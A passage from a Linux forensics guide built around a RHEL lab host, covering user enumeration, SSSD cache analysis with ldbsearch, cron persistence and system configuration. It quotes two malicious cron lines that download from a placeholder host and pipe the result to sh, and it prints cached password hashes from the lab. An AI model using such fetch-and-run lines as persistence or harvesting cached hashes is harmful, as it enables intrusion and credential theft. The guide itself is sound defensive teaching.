<p>Look for unusual user accounts in the <code>/etc/passwd</code> </p>
<pre><code class="language-bash">#!/bin/bash
NI_SHELLS=&quot;/sbin/nologin|/sbin/false|/sbin/true|/bin/sync|/sbin/shutdown|/sbin/halt&quot;

echo &quot;Non Interactive / Service Accounts&quot;
echo &quot;**********************************&quot;
egrep $NI_SHELLS /etc/passwd | cut -d: -f1 

echo &quot;&quot; 
echo &quot;Interactive Users&quot;
echo &quot;*****************&quot;
egrep -v $NI_SHELLS /etc/passwd | cut -d: -f1

echo &quot;&quot; 

</code></pre>
<h5 id="os_accounts_forensics-sample-output"><a class="header" href="#os_accounts_forensics-sample-output">Sample output</a></h5>
<pre><code class="language-bash">
[tlasso@rhel-richmondfc scripts]$ ./list_users.sh 
Non Interactive / Service Accounts
**********************************
bin
daemon
adm
lp
sync
shutdown
halt
mail
operator
games
ftp
nobody
systemd-coredump
dbus
polkitd
avahi
tss
colord
clevis
rtkit
sssd
geoclue
libstoragemgmt
systemd-oom
setroubleshoot
pipewire
flatpak
gdm
cockpit-ws
cockpit-wsinstance
gnome-initial-setup
sshd
chrony
dnsmasq
tcpdump



Interactive Users
*****************
root
tlasso

</code></pre>
<p>The <code>/etc/group</code>, <code>/etc/shadow</code>, <code>/etc/gshadow</code> must be cross referenced to check for any user ids or groups that are not recognized.<br />
This can be sign of an orphaned user account that was not removed correctly. </p>
<h3 id="os_accounts_forensics-account-earliest-activity--deleted-accounts"><a class="header" href="#os_accounts_forensics-account-earliest-activity--deleted-accounts">Account Earliest Activity &amp; Deleted Accounts</a></h3>
<p>The user home directory is created for all interactive users (unless explicitly configured). </p>
<p>Examine the <code>/home/</code> folder for a list of home directories. </p>
<pre><code class="language-bash">[tlasso@rhel-richmondfc ~]$ sudo ls -al /home
total 12
drwxr-xr-x.  5 root      root        84 Jun 14 03:21 .
dr-xr-xr-x. 18 root      root       235 Jun 14 02:26 ..
drwx------. 14 357201109 357200513 4096 Jun 14 03:23 nate@corp.tuxtriage.net
drwx------. 15 tlasso    tlasso    4096 Jun 18 19:25 tlasso
drwx------. 14 357201108 357200513 4096 Jun 14 03:14 tlasso@corp.tuxtriage.net
</code></pre>
<p>Note that in the above example there are two tlasso users. The <code>tlasso</code> user is a local system user while the <code>tlasso@corp.tuxtriage.net</code> is an AD user. </p>
<p>Since one of the first things the system does when a user is created is the creation of the home directory, this information can be approximated to the earliest presense of this user on the host. </p>
<p>If the investigation timelines are outside the earliest activity date, the user account may not be part of the incident. </p>
<p>The <code>Birth time</code> of the folder can be used for this purpose. </p>
<pre><code class="language-bash">[tlasso@rhel-richmondfc ~]$ stat /home/*
  File: /home/nate@corp.tuxtriage.net
  Size: 4096      	Blocks: 8          IO Block: 4096   directory
Device: fd00h/64768d	Inode: 102693422   Links: 14
Access: (0700/drwx------)  Uid: (357201109/ UNKNOWN)   Gid: (357200513/ UNKNOWN)
Context: unconfined_u:object_r:user_home_dir_t:s0
Access: 2023-06-14 03:21:01.790738178 -0400
Modify: 2023-06-14 03:23:10.091326083 -0400
Change: 2023-06-14 03:23:10.091326083 -0400
 Birth: 2023-06-14 03:21:01.790738178 -0400
  File: /home/tlasso
  Size: 4096      	Blocks: 8          IO Block: 4096   directory
Device: fd00h/64768d	Inode: 69333680    Links: 15
Access: (0700/drwx------)  Uid: ( 1000/  tlasso)   Gid: ( 1001/  tlasso)
Context: unconfined_u:object_r:user_home_dir_t:s0
Access: 2023-06-18 19:32:30.473261644 -0400
Modify: 2023-06-18 19:25:15.008942407 -0400
Change: 2023-06-18 19:25:15.008942407 -0400
 Birth: 2023-06-14 02:30:33.307059622 -0400
  File: /home/tlasso@corp.tuxtriage.net
  Size: 4096      	Blocks: 8          IO Block: 4096   directory
Device: fd00h/64768d	Inode: 101569584   Links: 14
Access: (0700/drwx------)  Uid: (357201108/ UNKNOWN)   Gid: (357200513/ UNKNOWN)
Context: unconfined_u:object_r:user_home_dir_t:s0
Access: 2023-06-14 03:11:59.697315839 -0400
Modify: 2023-06-14 03:14:12.457619105 -0400
Change: 2023-06-14 03:14:12.457619105 -0400
 Birth: 2023-06-14 03:11:59.697315839 -0400
</code></pre>
<h3 id="os_accounts_forensics-sssd-cache"><a class="header" href="#os_accounts_forensics-sssd-cache">SSSD Cache</a></h3>
<p>Any user that logs on via AD does not leave much trace on the system maintained files such as <code>/etc/passwd</code> etc. However, there are cache files that are updated as part of the logon process that can be analyzed to detect malicious user activity. </p>
<p>SSSD cache is located at <code>/var/lib/sss/db</code>. </p>
<pre><code class="language-bash">[tlasso@rhel-richmondfc scripts]$ sudo ls /var/lib/sss/db
cache_corp.tuxtriage.net.ldb  ccache_CORP.TUXTRIAGE.NET  config.ldb  sssd.ldb  timestamps_corp.tuxtriage.net.ldb
</code></pre>
<p>Of interest to us is the <code>cache_corp.tuxtriage.net.ldb</code> ldb database. See details about lbd format here <sup class="footnote-reference"><a href="#os_accounts_forensics-ldb">1</a></sup>.</p>
<p><code>ldbsearch</code> command can be used to search this database for records of interest. </p>
<pre><code class="language-bash">tlasso@rhel-richmondfc scripts]$ sudo ldbsearch -H /var/lib/sss/db/cache_corp.tuxtriage.net.ldb
asq: Unable to register control with rootdse!
# record 1
dn: gpoGUID={31B2F340-016D-11D2-945F-00C04FB984F9},cn=gpos,cn=ad,cn=custom,cn=corp.tuxtriage.net,cn=sysdb
gpoGUID: {31B2F340-016D-11D2-945F-00C04FB984F9}
gpoVersion: 3
objectClass: gpo
gpoPolicyFileTimeout: 1686727266
distinguishedName: gpoGUID={31B2F340-016D-11D2-945F-00C04FB984F9},cn=gpos,cn=a
 d,cn=custom,cn=corp.tuxtriage.net,cn=sysdb
...

# record 3
dn: name=tlasso@corp.tuxtriage.net,cn=users,cn=corp.tuxtriage.net,cn=sysdb
createTimestamp: 1686726711
fullName: Ted Lasso
gecos: Ted Lasso
gidNumber: 357200513
name: tlasso@corp.tuxtriage.net
objectCategory: user
uidNumber: 357201108
objectSIDString: S-1-5-21-2369507818-3716282536-1365522936-1108
uniqueID: 5e499899-1305-460b-82d9-87a949f32d18
originalDN: CN=Ted Lasso,CN=Users,DC=corp,DC=tuxtriage,DC=net
originalModifyTimestamp: 20230614062722.0Z
entryUSN: 41335
userPrincipalName: tlasso@CORP.TUXTRIAGE.NET
adAccountExpires: 9223372036854775807
adUserAccountControl: 512
nameAlias: tlasso@corp.tuxtriage.net
isPosix: TRUE
lastUpdate: 1686726711
dataExpireTimestamp: 1686732111
initgrExpireTimestamp: 0
ccacheFile: KCM:
cachedPasswordType: 1
failedLoginAttempts: 0
memberof: name=Domain Users@corp.tuxtriage.net,cn=groups,cn=corp.tuxtriage.net
 ,cn=sysdb
pacBlob:: BwAAAAAAAAABAAAA2AEAAHgAAAAAAAAABgAAABAAAABQAgAAAAAAAAcAAAAQAAAAYAIA
 AAAAAAAKAAAAFgAAAHACAAAAAAAADAAAAKgAAACIAgAAAAAAABAAAAAQAAAAMAMAAAAAAAATAAAAE
 AAAAEADAAAAAAAAARAIAMzMzMzIAQAAAAAAAAAAAgCpHPiCj57ZAf////////9//////////38lSO
 9GiZ7ZASUIWXFSn9kBJchIPIq/2QEMAAwABAACABIAEgAIAAIAAAAAAAwAAgAAAAAAEAACAAAAAAA
 UAAIAAAAAABgAAgABAAAAVAQAAAECAAABAAAAHAACACAAAAAAAAAAAAAAAAAAAAAAAAAAHgAgACAA
 AgAIAAoAJAACACgAAgAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAA
 CwAAgAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAB0AGwAYQBzAHMAbwAJAAAAAAAAAAkAAABUAGUAZA
 AgAEwAYQBzAHMAbwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAEAAAABAgAABwAAABAAAAAAAAAADwAAAFcASQBOAC0AVABVAEUAMQBWADIATQBKAEYANQBS
 AAAABQAAAAAAAAAEAAAAQwBPAFIAUAAEAAAAAQQAAAAAAAUVAAAA6tE7jaj4gd34OWRRAQAAADAAA
 gAHAAAAAQAAAAEBAAAAAAASAQAAABAAAABi2JyYFqoO2sq6CcwQAAAACawZ0ByD2C8dtvh8gE5Eq5
 Ce2QEMAHQAbABhAHMAcwBvAAAAMgAYACQAUAACAAAADAB4ABwAiAAAAAAAdABsAGEAcwBzAG8AQAB
 jAG8AcgBwAC4AdAB1AHgAdAByAGkAYQBnAGUALgBuAGUAdAAAAAAAAABDAE8AUgBQAC4AVABVAFgA
 VABSAEkAQQBHAEUALgBOAEUAVAAAAAAAdABsAGEAcwBzAG8AAAAAAAEFAAAAAAAFFQAAAOrRO42o+
 IHd+DlkUVQEAAAAAAAAEAAAAAElgqwi0pz73PmFIhAAAADlOc348iFviKxpfwI=
pacBlobExpireTimestamp: 1686727516
cachedPassword: $6$TuYfJdJ.n2nhNpsA$e8b8IGjnqoNmQCrWlit/Ucn7M2Iie2jq3DwOHEXTIz
 FzY17zamTuy3loYoH/w5DVYqS7t8lM8v6Be2ijrMmLa0
lastCachedPasswordChange: 1686727216
lastOnlineAuth: 1686727216
lastOnlineAuthWithCurrentToken: 1686727216
lastLogin: 1686727216
distinguishedName: name=tlasso@corp.tuxtriage.net,cn=users,cn=corp.tuxtriage.n
 et,cn=sysdb
... 
# record 8
dn: name=nate@corp.tuxtriage.net,cn=users,cn=corp.tuxtriage.net,cn=sysdb
createTimestamp: 1686727258
fullName: Nathan Shelley
gecos: Nathan Shelley
gidNumber: 357200513
name: nate@corp.tuxtriage.net
objectCategory: user
uidNumber: 357201109
objectSIDString: S-1-5-21-2369507818-3716282536-1365522936-1109
uniqueID: a4d7ff67-c14f-4568-b803-b1344d456af8
originalDN: CN=Nathan Shelley,CN=Users,DC=corp,DC=tuxtriage,DC=net
originalModifyTimestamp: 20230614062944.0Z
entryUSN: 41342
userPrincipalName: nate@CORP.TUXTRIAGE.NET
adAccountExpires: 9223372036854775807
adUserAccountControl: 512
nameAlias: nate@corp.tuxtriage.net
isPosix: TRUE
lastUpdate: 1686727258
dataExpireTimestamp: 1686732658
initgrExpireTimestamp: 0
memberof: name=Domain Users@corp.tuxtriage.net,cn=groups,cn=corp.tuxtriage.net
 ,cn=sysdb
pacBlob:: BwAAAAAAAAABAAAA4AEAAHgAAAAAAAAABgAAABAAAABYAgAAAAAAAAcAAAAQAAAAaAIA
 AAAAAAAKAAAAEgAAAHgCAAAAAAAADAAAAJgAAACQAgAAAAAAABAAAAAQAAAAKAMAAAAAAAATAAAAE
 AAAADgDAAAAAAAAARAIAMzMzMzQAQAAAAAAAAAAAgAAAAAAAAAAAP////////9//////////38tnc
 mbiZ7ZAS1dM8ZSn9kBLR0jkYq/2QEIAAgABAACABwAHAAIAAIAAAAAAAwAAgAAAAAAEAACAAAAAAA
 UAAIAAAAAABgAAgAAAAAAVQQAAAECAAABAAAAHAACACAAAAAAAAAAAAAAAAAAAAAAAAAAHgAgACAA
 AgAIAAoAJAACACgAAgAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAA
 CwAAgAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAABuAGEAdABlAA4AAAAAAAAADgAAAE4AYQB0AGgAYQ
 BuACAAUwBoAGUAbABsAGUAeQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
 AAAAAAAAAAAABAAAAAQIAAAcAAAAQAAAAAAAAAA8AAABXAEkATgAtAFQAVQBFADEAVgAyAE0ASgBG
 ADUAUgAAAAUAAAAAAAAABAAAAEMATwBSAFAABAAAAAEEAAAAAAAFFQAAAOrRO42o+IHd+DlkUQEAA
 AAwAAIABwAAAAEAAAABAQAAAAAAEgEAAAAAAAAAEAAAANNBR2M9XYa9xX8pNxAAAACF+5OW95HsbT
 4mEPAAwxbGkJ7ZAQgAbgBhAHQAZQAAAAAAAAAuABgAJABIAAIAAAAIAHAAHAB4AAAAAABuAGEAdAB
 lAEAAYwBvAHIAcAAuAHQAdQB4AHQAcgBpAGEAZwBlAC4AbgBlAHQAAABDAE8AUgBQAC4AVABVAFgA
 VABSAEkAQQBHAEUALgBOAEUAVAAAAAAAbgBhAHQAZQABBQAAAAAABRUAAADq0TuNqPiB3fg5ZFFVB
 AAAAAAAABAAAAAiqzSyLHV5O4/3XFsQAAAAMpv8w439cfo71DnY
pacBlobExpireTimestamp: 1686727561
ccacheFile: KCM:
cachedPassword: $6$.9jD7fiamZSK.KjF$IPjQgS76hMIMOjZ2K6/j3HFC7hies1Ezyiuur85cMU
 ZjKSntkCgNcxydyL86uqhpRJk9k7fTfMnkkqcs9xEKb/
cachedPasswordType: 1
lastCachedPasswordChange: 1686727261
failedLoginAttempts: 0
lastOnlineAuth: 1686727261
lastOnlineAuthWithCurrentToken: 1686727261
lastLogin: 1686727261
distinguishedName: name=nate@corp.tuxtriage.net,cn=users,cn=corp.tuxtriage.net
 ,cn=sysdb
...

# returned 14 records
# 14 entries
# 0 referrals
</code></pre>
<p>From the above results, we can locate domain users that have logged on by searching for entries with <code>pacBlob</code> value set. Once the records have been located, various attributes about the user activity can be determined. </p>
<p><code>User Name</code>: This can be located at <code>name</code> as well as <code>nameAlias</code> 
<code>objectSIDString</code>: The windows SID for this user. This is useful to locate activity of this user across other windows systems. 
<code>createTimestamp</code>: The create time for this user 
<code>lastLogin</code>: Last logon timestamp for the user. </p>
<div class="footnote-definition" id="os_accounts_forensics-ldb"><sup class="footnote-definition-label">1</sup>
<p><a href="https://linux.die.net/man/3/ldb">https://linux.die.net/man/3/ldb</a></p>
</div>
<div style="break-before: page; page-break-before: always;"></div><div id="lateral_movement"></div><h1 id="lateral_movement-lateral-movement"><a class="header" href="#lateral_movement-lateral-movement">Lateral movement</a></h1>
<h1 id="lateral_movement-ssh"><a class="header" href="#lateral_movement-ssh">SSH</a></h1>
<h1 id="lateral_movement-screen-share-tools"><a class="header" href="#lateral_movement-screen-share-tools">Screen share tools</a></h1>
<div style="break-before: page; page-break-before: always;"></div><div id="persistence"></div><h1 id="persistence-persistence"><a class="header" href="#persistence-persistence">Persistence</a></h1>
<p>Malware persistence is a technique used by malware to ensure that it remains on a system even after it has been rebooted or the user has logged off. This allows the malware to continue to run and execute its malicious code. Malware persistence is a critical part of many malware attacks. Without persistence, the malware would be easily removed by the user or by security software.</p>
<p>Malware persistence on Linux systems is achieved through a variety of methods, including:</p>
<ul>
<li>
<p><strong>Cron Jobs</strong>: Malware often manipulates cron, the Linux task scheduler, to execute malicious tasks periodically, thus maintaining persistence.</p>
</li>
<li>
<p><strong>Systemd Services</strong>: Linux's system and service manager, systemd, can also be abused by malware to initiate malicious processes at system startup, ensuring malware persistence.</p>
</li>
<li>
<p><strong>Script Modification</strong>: Malware can insert malicious code into commonly executed scripts, such as .bashrc or .bash_profile. Each time the script runs, so does the malware.</p>
</li>
<li>
<p><strong>Kernel Module Manipulation</strong>: Malware with root access can insert malicious kernel modules, enabling it to operate at a low level, beyond the reach of many security measures.</p>
</li>
<li>
<p><strong>Process Injection</strong>: Malware injects its code into a running process, allowing them to gain unauthorized access, manipulate process's behavior, or hide their presense. In addition to this, malware can gain persistence by running everytime the legitimate process runs. </p>
</li>
</ul>
<div style="break-before: page; page-break-before: always;"></div><div id="persistence_cron"></div><h1 id="persistence_cron-cron-jobs"><a class="header" href="#persistence_cron-cron-jobs">Cron Jobs</a></h1>
<p>Cron is a time-based job scheduler in *nix operating systems. It allows users to schedule commands or scripts to run at specific times or intervals. Cron jobs are often used to automate tasks, such as backups, file maintenance, and software updates. Unfortunately, it can also be leveraged by malicious actors for malware persistence. </p>
<p>There are two executables of note.
<code>crond</code> - this is the deamon program that run in the background and is responsible for executing the cron jobs. <code>crond</code> reads the <code>crontab</code> (cron table) file. The execution schedule is defined in a simple text format and contains the following. </p>
<ul>
<li>The time or interval at which the job should run</li>
<li>The command or script that should be run</li>
<li>The user that should run the job</li>
</ul>
<p>These files can be system-wide or user specific. </p>
<h2 id="persistence_cron-crontab-file-format"><a class="header" href="#persistence_cron-crontab-file-format">Crontab File format</a></h2>
<p>A cron job is defined by a single line in a crontab file, structured as follows: </p>
<pre><code class="language-bash">
* * * * * command-to-be-executed
- - - - -
| | | | |
| | | | ----- Day of the week (0 - 7) (Sunday = 0 or 7)
| | | ------- Month (1 - 12)
| | --------- Day of the month (1 - 31)
| ----------- Hour (0 - 23)
------------- Minute (0 - 59)
</code></pre>
<p>Each field can contain a single number, a comma-separated list of numbers, a range of numbers, or an asterisk (representing all possible numbers).</p>
<p>The second executable is <code>crontab</code> which is used to manage the crontab files. <code>crontab -e</code> can be used to edit the crontab file. </p>
<h3 id="persistence_cron-managing-crontab-entries"><a class="header" href="#persistence_cron-managing-crontab-entries">Managing crontab entries:</a></h3>
<ul>
<li><code>crontab -l</code> lists the current user's crontab entries.</li>
<li><code>crontab -e</code> opens the user's crontab file for editing.</li>
<li><code>crontab -r</code> removes the user's crontab file.</li>
</ul>
<h2 id="persistence_cron-crontab-file-locations"><a class="header" href="#persistence_cron-crontab-file-locations">Crontab file locations</a></h2>
<p>The crontab files for individual users are stored in the /var/spool/cron directory. Each user's crontab file has the same name as the username.</p>
<p>For example, if the username is <code>cbeard</code> the crontab file for that user would be located at <code>/var/spool/cron/cbeard</code>.</p>
<p>Additionally, system-wide cron jobs are stored in the <code>/etc/crontab</code> file. The <code>/etc/cron.d/</code> directory is also used to store system-wide cron files, where each file represents a separate cron job.</p>
<h2 id="persistence_cron-scheduling-with-anacron"><a class="header" href="#persistence_cron-scheduling-with-anacron">Scheduling with anacron</a></h2>
<p><code>anacron</code> is similar to <code>cron</code> in that it is also used for running scheduled tasks. </p>
<p>The primary difference between anacron and cron is how they handle missed or skipped jobs. In <code>cron</code>, if a system is powered off or inactive at the scheduled time of a task, the task will not be executed. <code>anacron</code> is designed to address this limitation by allowing the execution of missed tasks when the system becomes active again.</p>
<p>System-wide tasks are defined in the main configuration file (<code>/etc/anacrontab</code>), while user-specific tasks are defined in separate per-user configuration files located in <code>/var/spool/anacron/</code></p>
<h2 id="persistence_cron-task-scheduling-using-the-at-command"><a class="header" href="#persistence_cron-task-scheduling-using-the-at-command">Task scheduling using the 'at' command</a></h2>
<p>The <code>at</code> command in can be used to schedule one-time tasks or commands to run at a specific time in the future. It is particularly useful for scheduling jobs that need to run only once, without any recurring pattern. </p>
<div style="break-before: page; page-break-before: always;"></div><div id="persistence_systemd"></div><h1 id="persistence_systemd-systemd-services"><a class="header" href="#persistence_systemd-systemd-services">Systemd Services</a></h1>
<div style="break-before: page; page-break-before: always;"></div><div id="persistence_scripts"></div><h1 id="persistence_scripts-scripts"><a class="header" href="#persistence_scripts-scripts">Scripts</a></h1>
<div style="break-before: page; page-break-before: always;"></div><div id="persistence_forensics"></div><h1 id="persistence_forensics-forensic-artifacts"><a class="header" href="#persistence_forensics-forensic-artifacts">Forensic Artifacts</a></h1>
<p>https://sandflysecurity.com/blog/linux-malware-persistence-with-cron/ </p>
<p>*/11 * * * * wget -O - -q http://&lt;malicious_url&gt;/pics/logo.jpg|sh</p>
<p>*/5 * * * * curl http://&lt;malicious_url&gt;/malicious.png -k|dd skip=2446 bs=1|sh</p>
<div style="break-before: page; page-break-before: always;"></div><div id="execution"></div><div style="break-before: page; page-break-before: always;"></div><div id="network"></div><div style="break-before: page; page-break-before: always;"></div><div id="webhistory"></div><div style="break-before: page; page-break-before: always;"></div><div id="open_ports"></div><h1 id="open_ports-listening-ports"><a class="header" href="#open_ports-listening-ports">Listening Ports</a></h1>
<p><code>ss -l</code> </p>
<p>TODO: Add details about the ss command. </p>
<p><code>netstat -an</code> </p>
<p>Only open ports 
<code>netstat -tuln</code>
<code>ss -tuln</code> </p>
<div style="break-before: page; page-break-before: always;"></div><div id="active_connections"></div><div style="break-before: page; page-break-before: always;"></div><div id="dns_cache"></div><h1 id="dns_cache-dns-cache"><a class="header" href="#dns_cache-dns-cache">DNS Cache</a></h1>
<p>DNS records can provide crucial insights into network communications, identify malicious activities and uncover connections between compromised systems and C2 servers.</p>
<p>Cache records can be found in the </p>
<h3 id="dns_cache-configuration-files"><a class="header" href="#dns_cache-configuration-files">Configuration files</a></h3>
<p>DNS-related configuration files may contain valuable information. </p>
<p><code>/etc/resolv.conf</code>: Specifies the DNS servers used by the system.</p>
<p><code>/etc/hosts</code>: Contains local hostname-to-IP mappings.</p>
<h3 id="dns_cache-dns-caching-in-rhel"><a class="header" href="#dns_cache-dns-caching-in-rhel">DNS caching in RHEL</a></h3>
<p>RHEL does not cache DNS queries by default<sup class="footnote-reference"><a href="#dns_cache-dns_default">1</a></sup>. RHEL also does not recommend using any resolvers<sup class="footnote-reference"><a href="#dns_cache-rhel_rec">2</a></sup>. This implies that DNS caching artifacts may not be available for analysis. </p>
<p>DNS resolver </p>
<p>cat /etc/resolv.conf</p>
<p>Not much info on linux </p>
<div class="footnote-definition" id="dns_cache-dns_default"><sup class="footnote-definition-label">1</sup>
<p><a href="https://access.redhat.com/solutions/2189381">https://access.redhat.com/solutions/2189381</a></p>
</div>
<div class="footnote-definition" id="dns_cache-rhel_rec"><sup class="footnote-definition-label">2</sup>
<p><a href="https://access.redhat.com/solutions/6985629">https://access.redhat.com/solutions/6985629</a></p>
</div>
<div style="break-before: page; page-break-before: always;"></div><div id="exfiltration"></div><div style="break-before: page; page-break-before: always;"></div><div id="log_analysis"></div><h1 id="log_analysis-log-analysis"><a class="header" href="#log_analysis-log-analysis">Log Analysis</a></h1>
<p>https://www.tecmint.com/query-audit-logs-using-ausearch-tool-on-centos-rhel/ </p>
<div style="break-before: page; page-break-before: always;"></div><div id="config"></div><h1 id="config-system-configuration"><a class="header" href="#config-system-configuration">System Configuration</a></h1>
<h2 id="config-file-system"><a class="header" href="#config-file-system">File System</a></h2>
<h3 id="config-using-lsblk"><a class="header" href="#config-using-lsblk">Using lsblk</a></h3>
<pre><code class="language-bash">[tlasso@rhel-richmondfc scripts]$ lsblk -f
NAME          FSTYPE      FSVER    LABEL UUID                                   FSAVAIL FSUSE% MOUNTPOINTS
sda                                                                                            
├─sda1        vfat        FAT32          D7C9-A9C8                               591.8M     1% /boot/efi
├─sda2        xfs                        f96af77c-de86-4f65-b914-33373c4313cf    730.5M    28% /boot
└─sda3        LVM2_member LVM2 001       wZx9a7-JGa6-Za1A-3xtF-UXNZ-kPYx-w2gGVZ                
  ├─rhel-root xfs                        51074d0b-8172-4bd0-aca8-1558aa348c34     29.3G    15% /
  └─rhel-swap swap        1              7f8666f3-f284-4ee6-9bb2-91b3d8686a02                  [SWAP]
sr0                  
</code></pre>
<p>We can determine the file system in use as xfs for rhel-root (<code>/</code>) mount.</p>
<h3 id="config-from-fstab"><a class="header" href="#config-from-fstab">From fstab</a></h3>
<p>fstab file contains the file system information. </p>
<pre><code class="language-bash">cat /etc/fstab
</code></pre>
<pre><code class="language-bash">[tlasso@rhel-richmondfc scripts]$ cat /etc/fstab

#
# /etc/fstab
# Created by anaconda on Wed Jun 14 06:26:07 2023
#
# Accessible filesystems, by reference, are maintained under '/dev/disk/'.
# See man pages fstab(5), findfs(8), mount(8) and/or blkid(8) for more info.
#
# After editing this file, run 'systemctl daemon-reload' to update systemd
# units generated from this file.
#
/dev/mapper/rhel-root   /                       xfs     defaults        0 0
UUID=f96af77c-de86-4f65-b914-33373c4313cf /boot                   xfs     defaults        0 0
UUID=D7C9-A9C8          /boot/efi               vfat    umask=0077,shortname=winnt 0 2
/dev/mapper/rhel-swap   none                    swap    defaults        0 0
</code></pre>
<div style="break-before: page; page-break-before: always;"></div><div id="applications"></div><h1 id="applications-installed-applications"><a class="header" href="#applications-installed-applications">Installed Applications</a></h1>
<div style="break-before: page; page-break-before: always;"></div><div id="datasource_catalog"></div><h1 id="datasource_catalog-datasource-catalog"><a class="header" href="#datasource_catalog-datasource-catalog">Datasource Catalog</a></h1>
<div style="break-before: page; page-break-before: always;"></div><div id="about"></div>
                    </main>

                    <nav class="nav-wrapper" aria-label="Page navigation">
                        <!-- Mobile navigation buttons -->


                        <div style="clear: both"></div>
                    </nav>
                </div>
            </div>

            <nav class="nav-wide-wrapper" aria-label="Page navigation">

            </nav>

        </div>




        <script>
            window.playground_copyable = true;
        </script>


        <script src="elasticlunr.min.js"></script>
        <script src="mark.min.js"></script>
        <script src="searcher.js"></script>

        <script src="clipboard.min.js"></script>
        <script src="highlight.js"></script>
        <script src="book.js"></script>

        <!-- Custom JS scripts -->

        <script>
        window.addEventListener('load', function() {
            window.setTimeout(window.print, 100);
        });
        </script>

    </div>
    </body>
</html>
